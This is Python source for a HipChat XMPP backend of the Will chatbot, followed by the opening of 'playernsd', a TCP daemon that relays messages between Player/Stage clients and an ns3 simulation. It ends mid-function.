if "xmpp_jid" in room and name_or_id == room["xmpp_jid"]:
return room
if "room_id" in room and name_or_id == room["room_id"]:
return room
return None
class HipChatXMPPClient(ClientXMPP, HipChatRosterMixin, HipChatRoomMixin, StorageMixin, PubSubMixin):
def start_xmpp_client(self, xmpp_bridge_queue=None, backend_name=""):
logger = logging.getLogger(__name__)
if not xmpp_bridge_queue:
logger.error("Missing required bridge queue")
self.xmpp_bridge_queue = xmpp_bridge_queue
self.backend_name = backend_name
ClientXMPP.__init__(self, "%s/bot" % settings.HIPCHAT_USERNAME, settings.HIPCHAT_PASSWORD)
if settings.USE_PROXY:
self.use_proxy = True
self.proxy_config = {
'host': settings.PROXY_HOSTNAME,
'port': settings.PROXY_PORT,
'username': settings.PROXY_USERNAME,
'password': settings.PROXY_PASSWORD,
}
self.rooms = []
self.default_room = settings.HIPCHAT_DEFAULT_ROOM
my_user_url = "https://%(server)s/v2/user/%(user_id)s?auth_token=%(token)s" % {
"user_id": settings.HIPCHAT_USERNAME.split("@")[0].split("_")[1],
"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN,
}
r = requests.get(my_user_url, **settings.REQUESTS_OPTIONS)
resp = r.json()
if "email" in resp:
settings.HIPCHAT_EMAIL = resp["email"]
settings.HIPCHAT_HANDLE = resp["mention_name"]
settings.HIPCHAT_NAME = resp["name"]
else:
raise EnvironmentError(
"\n\nError getting user info from Hipchat. This is usually a problem with the\n"
"username or V2 token, but here's what I heard back from them: \n\n %s\n\n" % resp
)
self.available_rooms
if hasattr(settings, "HIPCHAT_ROOMS") and settings.HIPCHAT_ROOMS:
for r in settings.HIPCHAT_ROOMS:
if r != "":
if not hasattr(self, "default_room"):
self.default_room = r
try:
self.rooms.append(self.available_rooms[r])
except KeyError:
logger.error(
u'"{0}" is not an available room, ask'
' "@{1} what are the rooms?" for the full list.'
.format(r, settings.HIPCHAT_HANDLE))
else:
for name, r in self.available_rooms.items():
if not hasattr(self, "default_room"):
self.default_room = r
self.rooms.append(r)
self.nick = settings.HIPCHAT_HANDLE
self.handle = settings.HIPCHAT_HANDLE
self.mention_handle = "@%s" % settings.HIPCHAT_HANDLE
self.whitespace_keepalive = True
self.whitespace_keepalive_interval = 30
if settings.ALLOW_INSECURE_HIPCHAT_SERVER is True:
self.add_event_handler('ssl_invalid_cert', lambda cert: True)
self.add_event_handler("roster_update", self.join_rooms)
self.add_event_handler("session_start", self.session_start)
self.add_event_handler("message", self.message_recieved)
self.add_event_handler("groupchat_message", self.room_message)
self.add_event_handler("groupchat_invite", self.room_invite)
self.add_event_handler("error", self.handle_errors)
self.add_event_handler("presence_error", self.handle_errors)
self.register_plugin('xep_0045') # MUC
def session_start(self, event):
self.send_presence()
try:
self.get_roster()
except IqError as err:
logging.error('There was an error getting the roster')
logging.error(err.iq['error']['condition'])
self.disconnect()
except IqTimeout:
logging.error('Server is taking too long to respond. Disconnecting.')
self.disconnect()
def join_rooms(self, event):
for r in self.rooms:
if "xmpp_jid" in r:
self.plugin['xep_0045'].joinMUC(r["xmpp_jid"], settings.HIPCHAT_NAME, wait=True)
def handle_errors(self, event):
print("got error event")
print(event)
def room_invite(self, event):
logging.info("Invite recieved for %s" % event)
for r in self.rooms:
if "xmpp_jid" in r:
self.plugin['xep_0045'].joinMUC(r["xmpp_jid"], settings.HIPCHAT_NAME, wait=True)
def update_will_roster_and_rooms(self):
people = self.load('will_hipchat_people', {})
# Loop through the connected rooms (self.roster comes from ClientXMPP)
for roster_id in self.roster:
cur_roster = self.roster[roster_id]
# Loop through the users in a given room
for user_id in cur_roster:
user_data = cur_roster[user_id]
if user_data["name"] != "":
# If we don't have this user in the people, add them.
if not user_id in people:
people[user_id] = Person()
hipchat_id = user_id.split("@")[0].split("_")[1]
# Update their info
people[user_id].update({
"name": user_data["name"],
"jid": user_id,
"hipchat_id": hipchat_id,
})
# If we don't have a nick yet, pull it and mention_name off the master user list.
if not hasattr(people[user_id], "nick") and hipchat_id in self.people:
user_data = self.get_user_list[hipchat_id]
people[user_id].nick = user_data["mention_name"]
people[user_id].mention_name = user_data["mention_name"]
# If it's me, save that info!
if people[user_id].get("name", "") == self.nick:
self.me = people[user_id]
self.save("will_hipchat_people", people)
self.update_available_rooms()
def room_message(self, msg):
self._send_to_backend(msg)
def message_recieved(self, msg):
if msg['type'] in ('chat', 'normal'):
self._send_to_backend(msg)
def real_sender_jid(self, msg):
# There's a bug in sleekXMPP where it doesn't set the "from_jid" properly.
# Thus, this hideous hack.
msg_str = "%s" % msg
start = 'from_jid="'
start_pos = msg_str.find(start)
if start_pos != -1:
cut_start = start_pos + len(start)
return msg_str[cut_start:msg_str.find('"', cut_start)]
return msg["from"]
def _send_to_backend(self, msg):
stripped_msg = Bunch()
# TODO: Find a faster way to do this - this is crazy.
for k, v in msg.__dict__.items():
try:
pickle.dumps(v)
stripped_msg[k] = v
except:
pass
for k in msg.xml.keys():
try:
# print(k)
# print(msg.xml.get(k))
pickle.dumps(msg.xml.get(k))
stripped_msg[k] = msg.xml.get(k)
except:
# print("failed to parse %s" % k)
pass
stripped_msg.xmpp_jid = msg.getMucroom()
stripped_msg.body = msg["body"]
self.xmpp_bridge_queue.put(stripped_msg)
class HipChatBackend(IOBackend, HipChatRosterMixin, HipChatRoomMixin, StorageMixin):
friendly_name = "HipChat"
internal_name = "will.backends.io_adapters.hipchat"
required_settings = [
{
"name": "HIPCHAT_USERNAME",
"obtain_at": """1. Go to hipchat, and create a new user for will.
2. Log into will, and go to Account settings>XMPP/Jabber Info.
3. On that page, the 'Jabber ID' is the value you want to use.""",
},
{
"name": "HIPCHAT_PASSWORD",
"obtain_at": (
"1. Go to hipchat, and create a new user for will. "
"Note that password - this is the value you want. "
"It's used for signing in via XMPP."
),
},
{
"name": "HIPCHAT_V2_TOKEN",
"obtain_at": """1. Log into hipchat using will's user.
2. Go to https://your-org.hipchat.com/account/api
3. Create a token.
4. Copy the value - this is the HIPCHAT_V2_TOKEN.""",
}
]
def send_direct_message(self, user_id, message_body, html=False, card=None, notify=False, **kwargs):
if kwargs:
logging.warn("Unknown keyword args for send_direct_message: %s" % kwargs)
format = "text"
if html:
format = "html"
try:
# https://www.hipchat.com/docs/apiv2/method/private_message_user
url = PRIVATE_MESSAGE_URL % {"server": settings.HIPCHAT_SERVER,
"user_id": user_id,
"token": settings.HIPCHAT_V2_TOKEN}
data = {
"message": message_body,
"message_format": format,
"notify": notify,
"card": card,
}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
r = requests.post(url, headers=headers, data=json.dumps(data), **settings.REQUESTS_OPTIONS)
r.raise_for_status()
except:
logging.critical("Error in send_direct_message: \n%s" % traceback.format_exc())
def send_room_message(self, room_id, message_body, html=False, color="green", notify=False, card=None, **kwargs):
if kwargs:
logging.warn("Unknown keyword args for send_room_message: %s" % kwargs)
format = "text"
if html:
format = "html"
try:
# https://www.hipchat.com/docs/apiv2/method/send_room_notification
url = ROOM_NOTIFICATION_URL % {"server": settings.HIPCHAT_SERVER,
"room_id": room_id,
"token": settings.HIPCHAT_V2_TOKEN}
data = {
"message": message_body,
"message_format": format,
"color": color,
"notify": notify,
"card": card,
}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
r = requests.post(url, headers=headers, data=json.dumps(data), **settings.REQUESTS_OPTIONS)
r.raise_for_status()
except:
logging.critical("Error in send_room_message: \n%s" % traceback.format_exc())
def set_room_topic(self, room_id, topic):
try:
# https://www.hipchat.com/docs/apiv2/method/send_room_notification
url = ROOM_TOPIC_URL % {"server": settings.HIPCHAT_SERVER,
"room_id": room_id,
"token": settings.HIPCHAT_V2_TOKEN}
data = {
"topic": topic,
}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
requests.put(url, headers=headers, data=json.dumps(data), **settings.REQUESTS_OPTIONS)
except:
logging.critical("Error in set_room_topic: \n%s" % traceback.format_exc())
def get_room_from_message(self, event):
kwargs = {}
if hasattr(event, "kwargs"):
kwargs.update(event.kwargs)
if hasattr(event, "source_message") and event.source_message:
send_source = event.source_message
if hasattr(event.source_message, "data"):
send_source = event.source_message.data
if send_source.is_private_chat:
# Private, 1-1 chats.
return False
else:
# We're in a public room
return send_source.channel.id
else:
# Came from webhook/etc
if "room" in kwargs:
return kwargs["room"],
else:
return self.get_room_from_name_or_id(settings.HIPCHAT_DEFAULT_ROOM)["room_id"]
return False
def get_hipchat_user(self, user_id, q=None):
url = USER_DETAILS_URL % {"server": settings.HIPCHAT_SERVER,
"user_id": user_id,
"token": settings.HIPCHAT_V2_TOKEN}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
if q:
q.put(r.json())
else:
return r.json()
@property
def people(self):
if not hasattr(self, "_people"):
full_roster = {}
# Grab the first roster page, and populate full_roster
url = ALL_USERS_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN,
"start_index": 0,
"max_results": 1000}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for user in r.json()['items']:
full_roster["%s" % (user['id'],)] = Person(
id=user["id"],
handle=user["mention_name"],
mention_handle="@%s" % user["mention_name"],
source=clean_for_pickling(user),
name=user["name"],
)
# Keep going through the next pages until we're out of pages.
while 'next' in r.json()['links']:
url = "%s&auth_token=%s" % (r.json()['links']['next'], settings.HIPCHAT_V2_TOKEN)
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for user in r.json()['items']:
full_roster["%s" % (user['id'],)] = Person(
id=user["id"],
handle=user["mention_name"],
mention_handle="@%s" % user["mention_name"],
source=clean_for_pickling(user),
name=user["name"],
)
self._people = full_roster
for k, u in full_roster.items():
if u.handle == settings.HIPCHAT_HANDLE:
self.me = u
return self._people
@property
def channels(self):
if not hasattr(self, "_channels"):
all_rooms = {}
# Grab the first roster page, and populate all_rooms
url = ALL_ROOMS_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN,
"start_index": 0,
"max_results": 1000}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for room in r.json()['items']:
# print(room)
all_rooms["%s" % (room['xmpp_jid'],)] = Channel(
id=room["id"],
name=room["name"],
source=clean_for_pickling(room),
members={},
)
# Keep going through the next pages until we're out of pages.
while 'next' in r.json()['links']:
url = "%s&auth_token=%s" % (r.json()['links']['next'], settings.HIPCHAT_V2_TOKEN)
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for room in r.json()['items']:
all_rooms["%s" % (room['xmpp_jid'],)] = Channel(
id=room["id"],
name=room["name"],
source=clean_for_pickling(room),
members={}
)
self._channels = all_rooms
return self._channels
def normalize_incoming_event(self, event):
logging.debug("hipchat: normalize_incoming_event - %s" % event)
if event["type"] in ("chat", "normal", "groupchat") and ("from_jid" in event or "from" in event):
sender = self.get_user_from_message(event)
interpolated_handle = "@%s" % self.me.handle
will_is_mentioned = False
will_said_it = False
channel = None
if "xmpp_jid" in event and event["xmpp_jid"]:
channel = clean_for_pickling(self.channels[event["xmpp_jid"]])
is_private_chat = False
else:
if event["type"] in ("chat", "normal"):
is_private_chat = True
is_direct = False
if is_private_chat or event["body"].startswith(interpolated_handle):
is_direct = True
if event["body"].startswith(interpolated_handle):
event["body"] = event["body"][len(interpolated_handle):].strip()
if interpolated_handle in event["body"]:
will_is_mentioned = True
if sender and self.me and sender.id == self.me.id:
will_said_it = True
m = Message(
content=event["body"],
is_direct=is_direct,
is_private_chat=is_private_chat,
is_group_chat=not is_private_chat,
backend=self.internal_name,
sender=sender,
channel=channel,
will_is_mentioned=will_is_mentioned,
will_said_it=will_said_it,
backend_supports_acl=True,
original_incoming_event=clean_for_pickling(event),
)
# print("normalized:")
# print(m.__dict__)
return m
else:
# print("Unknown event type")
# print(event)
return None
def handle_outgoing_event(self, event):
kwargs = {}
if hasattr(event, "kwargs"):
kwargs.update(event.kwargs)
room = None
passed_room = None
if "room" in kwargs:
passed_room = kwargs["room"]
if "channel" in kwargs:
passed_room = kwargs["channel"]
if passed_room:
if isinstance(passed_room, str):
# User passed in a room string
room = self.get_room_from_name_or_id(passed_room)
else:
# User found the internal HipChatRoom object and passed it.
room = passed_room
else:
# Default to the room we heard this message in.
room = self.get_room_from_message(event)
room_id = None
if room and hasattr(room, "id"):
room_id = room.id
else:
room_id = room
if event.type in ["say", "reply"]:
event.content = re.sub(r'>\s+<', '><', event.content)
if hasattr(event, "source_message") and event.source_message and not room:
send_source = event.source_message
if hasattr(event.source_message, "data"):
send_source = event.source_message.data
if send_source.is_private_chat:
# Private, 1-1 chats.
self.send_direct_message(send_source.sender.id, event.content, **kwargs)
return
# Otherwise trust room.
self.send_room_message(
room_id,
event.content,
**kwargs
)
elif event.type in ["topic_change", ]:
if room_id:
self.set_room_topic(room_id, event.content)
else:
if hasattr(event, "source_message") and event.source_message:
send_source = event.source_message
if hasattr(event.source_message, "data"):
send_source = event.source_message.data
self.send_direct_message(send_source.sender.id, "I can't set the topic of a one-to-one chat. Let's just talk.", **kwargs)
elif (
event.type == "message.no_response"
and event.data.is_direct
and event.data.will_said_it is False
):
if event.data.original_incoming_event.type == "groupchat":
self.send_room_message(
event.data.channel.id,
random.choice(UNSURE_REPLIES),
**kwargs
)
else:
self.send_direct_message(
event.data.sender.id,
random.choice(UNSURE_REPLIES),
**kwargs
)
def __handle_bridge_queue(self):
while True:
try:
try:
input_event = self.xmpp_bridge_queue.get(timeout=settings.EVENT_LOOP_INTERVAL)
if input_event:
self.handle_incoming_event(input_event)
except Empty:
pass
except (KeyboardInterrupt, SystemExit):
pass
self.sleep_for_event_loop()
def bootstrap(self):
# Bootstrap must provide a way to to have:
# a) self.normalize_incoming_event fired, or incoming events put into self.incoming_queue
# b) any necessary threads running for a)
# c) self.me (Person) defined, with Will's info
# d) self.people (dict of People) defined, with everyone in an organization/backend
# e) self.channels (dict of Channels) defined, with all available channels/rooms.
# Note that Channel asks for members, a list of People.
# f) A way for self.handle, self.me, self.people, and self.channels to be kept accurate,
# with a maximum lag of 60 seconds.
self.client = HipChatXMPPClient("%s/bot" % settings.HIPCHAT_USERNAME, settings.HIPCHAT_PASSWORD)
self.xmpp_bridge_queue = Queue()
self.client.start_xmpp_client(
xmpp_bridge_queue=self.xmpp_bridge_queue,
backend_name=self.internal_name,
)
self.client.connect()
# Even though these are properties, they do some gets and self-fillings.
self.people
self.channels
self.bridge_thread = Process(target=self.__handle_bridge_queue)
self.bridge_thread.start()
self.xmpp_thread = Process(target=self.client.process, kwargs={"block": True})
self.xmpp_thread.start()
def terminate(self):
if hasattr(self, "xmpp_thread"):
self.xmpp_thread.terminate()
if hasattr(self, "bridge_thread"):
self.bridge_thread.terminate()
while (
(hasattr(self, "xmpp_thread") and self.xmpp_thread.is_alive())
or (hasattr(self, "bridge_thread") and self.bridge_thread.is_alive())
):
time.sleep(0.2)
|
__main__.py
|
#!/usr/bin/env python
#
# Copyright (c) 2011, The University of York
# All rights reserved.
# Author(s):
# Tai Chi Minh Ralph Eastwood <tcmreastwood@gmail.com>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the The University of York nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# ANY ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE UNIVERSITY OF YORK BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
## @file __init__.py
# @brief The NS3 daemon for player.
# @author Tai Chi Minh Ralph Eastwood <tcme500@cs.york.ac.uk>
# @author University of York
# @date 2011
## @namespace playernsd
#This is the main module which provides the interface
#between ns3 and player/stage.
## @mainpage playernsd
# @brief The NS3 daemon for player.
# @author Tai Chi Minh Ralph Eastwood <tcme500@cs.york.ac.uk>
# @author University of York
# @date 2011
#
# @section sec_details Implementation Details
#
#Details for the protocol can be found @ref page_protocol "here".
#
## @page page_protocol Protocol for communication
#
# @section sec_protocol Protocol for communication
#
# @subsection subsec_server_messages Server messages
# @li @b greetings IPADDRESS playernsd VERSION\\n
# @li @b registered
# @li @b pong\\n
# @li @b ping\\n
# @li @b error message\\n
# @li @b msgtext src\\nMESSAGE\\n
# @li @b msgbin src length\\nBINARYDATA
# @li @b propval var VALUE\n
#
# @subsection subsec_client_messages Client messages
# @li @b greetings CLIENTID playernsd VERSION\\n
# @li @b ping\\n
# @li @b pong\\n
# @li @b error message\\n
# @li @b msgtext [dest]\\nMESSAGE\\n
# @li @b msgbin [dest] length\\nBINARYDATA
# @li @b propget var\\n
# @li @b propset var VALUE\\n
import SocketServer
import socket
import time
import threading
import optparse
import sys
import logging
import os
import shlex
import imp
from playernsd.timer import PeriodicTimer
from playernsd.remoteclient import RemoteClient
# Global config variables
## Name of daemon
NAME = "playernsd"
## Version of playernsd protocol
VERSION = "0001"
__version__ = "0.0.1"
## IP to listen on
IP = ''
## Port to listen on
PORT = 9999
## Logfile name (playernsd.log is default)
LOGFILE = NAME + '.log'
## Verbosity level (1 is default)
VERBOSE = 1
## Maximum number of bytes to send (from client) (4096 is default)
MAX_SEND = 4096
## Maximum number of bytes to read (4096+64 is default)
MAX_READ = MAX_SEND + 64
## The timeout before a ping, i.e. the interval the client manager checks
CLIENT_TIMEOUT = 1.0
## The minimum number of pings missed before the client is disconnected
# unless there is an error on the socket, in which case, it is disconnected
# immediately.
MISSED_PING = 3
## Format for logging messages
LOG_FORMAT = '%(asctime)-15s %(levelname)-6s: %(message)s'
## Globals
properties = {}
## Get the value for a property.
# @param key The key of the property to get the value for.
def propget(key):
if key in properties:
return properties[key]
else: # Ask ns3
return None
## Set the value for a property.
# @param key The key of the property to get the value for.
def propset(key, value):
if key in properties:
properties[key] = value
else: # Ask ns3
pass
## The client manager class for handling client connections.
#
# The client manager class periodically checks clients by pinging them
# and waiting for a pong response. Clients that fail to respond, will
# be discarded. It also provides routines for sending and receiving
# messages.
class ClientManager():
## Class constructor
# @param self The instance of playernsd::ClientManager.
# @param timeout The number of seconds for a timeout.
# @param missed_ping The number of missed pings allowed before a disconnect.
def __init__(self, timeout, missed_ping, simulation):
self.__client_lock = threading.Lock()
self.__timed_out_lock = threading.Lock()
self.__clients = {}
self.__clientids = {}
self.__timed_out = []
self.__ping_pong = {}
self.__t = PeriodicTimer(timeout, self.__timeout_check, [self])
## The number of missed pings allowed
self.missed_ping = missed_ping
self.__sim = simulation
self.__t.daemon = True
## Start the timeout poller
# @param self The instance of playernsd::ClientManager.
def start(self):
self.__t.start()
## Stop the timeout poller
# @param self The instance of playernsd::ClientManager.
def stop(self):
self.__t.cancel()
## Add a client that should be polled by the timeout poller
# @param self The instance of playernsd::ClientManager.
# @param address The address of the client.
# @param client The associated playernsd:RemoteClient object.
def add_client(self, address, client):
with self.__client_lock:
self.__clients[address] = RemoteClient(None, address, None, client)
self.__ping_pong[address] = 1
## Register a client with name and protocol version.
# @param name The name of the client.
# @param address The addres sof the client.
def register_client(self, address, name, version):
self.__clients[address].name = name
self.__clients[address].version = version
self.__clientids[name] = self.__clients[address]
if self.__sim:
self.__sim.new_client(name)
## Check if the address is handled by the client manager.
# @param identifier The identifier to refer uniquely to a client.
def has_client(self, identifier):
if isinstance(identifier, str):
return identifier in self.__clientids
else:
return identifier in self.__clients
## Check if the address is already registered in the client manager.
# @param identifier The identifier to refer uniquely to a client.
def is_registered(self, identifier):
if isinstance(identifier, str):
return identifier in self.__clientids
else:
return identifier in self.__clients and self.__clients[identifier].name != None
## Get a RemoteClient object when identified by address or id.
# @param identifier The identifier to refer uniquely to a client.
def get_client(self, identifier):
if isinstance(identifier, str):
return self.__clientids[identifier]
else:
return self.__clients[identifier]
## Remove a client that is polled by the timeout poller.
# @param self The instance of playernsd::ClientManager.
# @param address The address of the client.
def remove_client(self, address):
with self.__client_lock:
if self.__clients[address].name in self.__clientids:
if self.__sim:
self.__sim.remove_client(self.__clients[address].name)
del self.__clientids[self.__clients[address].name]
del self.__clients[address]
## Get a list of client ids.
def get_clientid_list(self):
l = []
for v in self.__clients.itervalues():
l.append(v.name)
return l
## Indicate that a particular client has replied to a ping.
# @param self The instance of playernsd::ClientManager.
# @param address The address of the client.
def pong(self, address):
self.__ping_pong[address] = 0
## Check if a particular client has timed out.
# @param self The instance of playernsd::ClientManager.
# @param address The address of the client.
# @return Boolean return indicating whether the client has timed out.
def is_timed_out(self, address):
return address in self.__timed_out or \
self.__ping_pong[address] < -self.missed_ping
## Send a message to a client.
#
# This is a wrapper function to send a message to a client.
# By default, this sends the message to the client that invoked the request,
# but with the parameters @a s (the target socket) and
# @a ca (the target client address), any client can be messaged.
# @param self The playernsd::ClientManager instance.
# @param msg The message to be sent.
# @param s The socket to send the message to.
# @param ca The client address to send the message to.
def send(self, msg, s, ca):
if VERBOSE > 1:
self.log(ca, 'SEND(' + str(len(msg)) + ')', msg)
# read the type of message, and see if the message should be
# simulated
command = msg.split(' ')
if simulation and (command[0] == 'msgtext' or command[0] == 'msgbin'):
self.__sim.send(command[1], self.__clientids(ca),
msg[msg.find('\n')+1:])
else:
s.send(msg)
## Get a property from the simulation
#
# This function requests a value from the simulation.
# @param self The playernsd::ClientManager instance.
# @param ca The client address that this request comes from.
# @param prop The name of the property.
def prop_get_sim(self, prop, ca):
if self.__sim:
cid = self.__clients[ca].name
self.__sim.prop_get(cid, prop)
else:
self.__clients[ca].socket.send('propval ' + prop + ' ' + '\n')
## Set a property in the simulation
#
# This function sets a value from the simulation.
# @param self The playernsd::ClientManager instance.
# @param _from The client address that this request comes from.
# @param prop The name of the property.
# @param val The value of the property.
def prop_set_sim(self, prop, val, ca):
if self.__sim:
cid = self.__clients[ca].name
self.__sim.prop_set(cid, prop, val)
## Broadcast a message to all clients.
#
# This is a wrapper function to broadcast a message to all clients.
# @param self The playernsd::ClientManager instance.
# @param msg The message to be sent to all clients.
def broadcast(self, msg):
if simulation:
command = msg.split(' ')
self.__sim.send(command[1], '__broadcast__',
msg[msg.find('\n')+1:])
else:
for v in self.__clients.itervalues():
if msg.split(' ')[1] != v.name:
self.send(msg, v.socket, v.address)
## Receive a message from a client.
#
# This is a wrapper function to receive a message from a client and
# logs it.
# @param self The playernsd::ClientManager instance.
# @param s The socket to send the message to.
# @param ca The client address to send the message to.
# @return The message received from the client.
def recv(self, s, ca):
data = s.recv(MAX_READ)
if VERBOSE > 1:
self.log(ca, 'RECV(' + str(len(data)) + ')', data)
return data
## Receive a message from the simulation.
def recv_sim(self, _from, to, msg):
self.__clientids[to].socket.send('msgbin ' + _from + ' ' + str(len(msg)) + '\n' + msg)
## Receive a property value from the simulation.
def prop_val_sim(self, _from, prop, val):
#if val == "":
#self.send('error propnotexist\n') # TODO: Handle empty strings separately?
#else:
self.__clientids[_from].socket.send('propval ' + prop + ' ' + str(val) + '\n')
## Create a log message.
#
# This is used internally to log sent and received messages.
# This is typically only called when --verbose is passed to the daemon.
# @param self The playernsd::ClientManager instance.
# @param ca Client address related to log message.
# @param tag Tag indicating the log level.
# @param msg The message to be logged.
def log(self, ca, tag, msg):
if len(msg):
logmsg = tag + ': ' + msg.encode(sys.stdout.encoding,
'backslashreplace').replace('\n', '\\n')
log.debug(self.get_id(ca) + ' ' + logmsg)
## Get id of client or else return '__unregistered'
def get_id(self, ca):
if ca in self.__clients and self.__clients[ca].name != None:
return '[' + str(ca) + ', ' + self.__clients[ca].name + ']'
else:
return '[' + str(ca) + ', __unregistered]'
# Callback function that periodically checks all clients to see whether
# they are still responding.
# @param args Additional arguments.
# @param args Additional keyword arguments.
def __timeout_check(self, args, kwargs):
with self.__client_lock:
for k,v in self.__clients.iteritems():
try:
self.send('ping\n', v.socket, k)
self.__ping_pong[k] -= 1
if self.__ping_pong[k] < -self.missed_ping:
log.warn(str(k) + ' has missed at least ' +
str(-self.__ping_pong[k]+1) + ' pings, closing connection')
self.send('error missedping\n', v.socket, k)
v.socket.shutdown(1)
except socket.error, msg:
if not self.is_timed_out(k):
self.__timed_out.append(k)
log.warn('Lost connection to ' + str(k) + ' ' + str(msg))
## Stop the client manager thread
#
# This is used to gracefully close the client manager and simulation threads.
# @param self The playernsd::ClientManager instance.
def stop(self):
log.info('Client manager closing down...');
if self.__sim:
log.info('Stopping simulator...');
self.__sim.stop()
log.info('Simulator stopped...');
log.info('Stopping timeout checker...');
self.__t.cancel()
log.info('Timeout checker stopped...');
## Request state enumeration (Internal)
class RequestState:
COMMAND = 0
MSGTEXT = 1
MSGBIN = 2
## The TCP request handler class interacts with clients.
#
# The TCP request handler class deals with all the connections, messages
# received and replies with the clients.
class TCPRequestHandler(SocketServer.BaseRequestHandler):
## Send a message to a client.
#
# This is a wrapper function to send a message to a client.
# By default, this sends the message to the client that invoked the request,
# but with the parameters @a s (the target socket) and
# @a ca (the target client address), any client can be messaged.
# @param self The playernsd::TCPRequestHandler instance.
# @param msg The message to be sent.
# @param s The socket to send the message to.
# @param ca The client address to send the message to.
def send(self, msg, s=None, ca=None):
if not s:
s = self.request
if not ca:
ca = self.client_address
client_manager.send(msg, s, ca)
## Broadcast a message to all clients.
#
# This is a wrapper function to broadcast a message to all clients.
# @param self The playernsd::TCPRequestHandler instance.
# @param msg The message to be sent to all clients.
def broadcast(self, msg):
client_manager.broadcast(msg)
## Receive a message from a client.
#
# This is a wrapper function to receive a message from a client and
# logs it.
# @param self The playernsd::TCPRequestHandler instance.
# @param s The socket to send the message to.
# @param ca The client address to send the message to.
# @return The message received from the client.
def recv(self, s=None, ca=None):
if not s:
s = self.request
if not ca:
ca = self.client_address
return client_manager.recv(s, ca)
## Setup a connection with a client.
#
# This is called whenever a new client connects.
# @param self The playernsd::TCPRequestHandler instance.
def setup(self):
ca = self.client_address
log.info(client_manager.get_id(ca) + ' Connected!')
self.send('greetings ' + ca[0] + ' ' + NAME + ' ' + VERSION + '\n')
client_manager.add_client(ca, self.request)
self.__state = RequestState.COMMAND
## Function that handles all client requests.
#
# For a description of the protocol, please see \ref page_protocol "Protocol for communication".
# @param self The playernsd::TCPRequestHandler instance.
def handle(self):
msgbin = ''
msg_len = 0
data = ''
__state = RequestState.COMMAND
lastlen = 0
while True:
try:
# Shorthand for client address
ca = self.client_address
# Clear anything that has timed out
if client_manager.is_timed_out(ca):
return
# Check state if we're currently reading binary msg
if __state == RequestState.MSGBIN:
if msg_len > len(data):
data += self.recv()
readlen = len(data)
msgbin += data[:msg_len]
data = data[msg_len:]
msg_len -= readlen
if msg_len <= 0:
if msg_broadcast:
self.broadcast('msgbin ' + client_manager.get_client(ca).name + ' ' +
str(len(msgbin)) + '\n' + msgbin)
else:
self.send('msgbin ' + client_manager.get_client(ca).name + ' ' +
str(len(msgbin)) + '\n' + msgbin, msg_cs, msg_ca)
__state = RequestState.COMMAND
continue
elif __state == RequestState.MSGTEXT:
# Look for new lines in current data
nlpos = data.find('\n')
if nlpos == -1:
# None found, grab some new data
data += self.recv()
# Anything to do?
if len(data) == 0:
continue
# Look for new lines in new data
nlpos = data.find('\n')
# None found: *shouldn't happen unless really slow connection*
if nlpos == -1:
# Warn about this:
log.warn(client_manager.get_id(ca) + ' Data received for msgtext, but no newline.')
continue
# Get the message text
msgtext = data[:nlpos]
# Remove that from the data
data = data[nlpos+1:]
# Send the message off
if msg_broadcast:
self.broadcast('msgtext ' + client_manager.get_client(ca).name + '\n' + msgtext)
else:
self.send('msgtext ' + client_manager.get_client(ca).name + '\n' + msgtext, msg_cs, msg_ca)
__state = RequestState.COMMAND
continue
elif __state == RequestState.COMMAND:
# Look for new lines in current data
nlpos = data.find('\n')
if nlpos == -1:
# None found, grab some new data
data += self.recv()
# Anything to do?
if len(data) == 0:
continue
# Look for new lines in new data
nlpos = data.find('\n')
# None found: *shouldn't happen unless really slow connection*
if nlpos == -1:
# Warn about this:
if lastlen != len(data):
lastlen = len(data)
log.warn(client_manager.get_id(ca) + ' Data received, but no commands.')
continue
# Parse one message out
command = data[:nlpos].split(' ')
# Remove that from the data
data = data[nlpos+1:]
# We don't need the command after we know what it is
cmd = command.pop(0)
if cmd == 'greetings':
# check parameter count
if len(command) < 3:
self.send('error invalidparamcount\n')
continue
# store the client's id for the address
cid = command.pop(0)
if client_manager.is_registered(ca):
# if already registered, don't register again (send error back)
self.send('error alreadyregistered\n')
elif client_manager.is_registered(cid):
# if it already exists, this is a problem, send back error
# and disconnect
log.error(client_manager.get_id(ca) + ' tried to connect using id \'' + cid +
'\' which is assigned to ' + client_manager.get_client(cid).name)
# tell client that name is in use
self.send('error clientidinuse\n')
else:
# add client to the list of clients & client ids & version
log.info(client_manager.get_id(ca) + ' registered with name \'' + cid + '\'')
if command[0] != NAME:
log.error(client_manager.get_id(ca) + ' name of the client is ' + command[0])
# terminate the connection
return
client_manager.register_client(ca, cid, command[1])
